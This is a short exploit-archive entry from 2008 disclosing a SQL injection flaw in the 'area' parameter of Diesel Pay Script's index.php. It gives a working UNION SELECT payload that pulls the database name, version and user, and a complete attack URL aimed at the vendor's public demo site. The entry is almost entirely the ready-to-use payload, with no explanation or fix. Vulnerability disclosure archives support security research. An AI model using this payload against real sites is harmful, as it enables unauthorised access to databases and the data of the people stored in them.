id: 3699
date: 09/19/2008
title: Diesel Pay Script (area) Remote SQL Injection Vulnerability
author: ZoRLu
cves: 

===========================================================
Diesel Pay Script (area) Remote SQL Injection Vulnerability
===========================================================


[~] Diesel Pay Script
[~]
[~] index.php (area) sql inj
[~]
[~] http://www.dieselscripts.com
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 20.09.2008
[~]
[~] -----------------------------------------------------------

Exploit:

http://localhost/script_path/index.php?a=browse&area=[SQL]

[SQL]= 

ZoRLu'+union+select+null,null,null,null,null,concat(database(),0x3a,version(),0x3a,user()),null/*

Demo:

http://www.dieselscripts.com/demo/dieselpay/index.php?a=browse&area=ZoRLu'+union+select+null,null,null,null,null,concat(database(),0x3a,version(),0x3a,user()),null/*




#  0day.today [2023-03-25]  #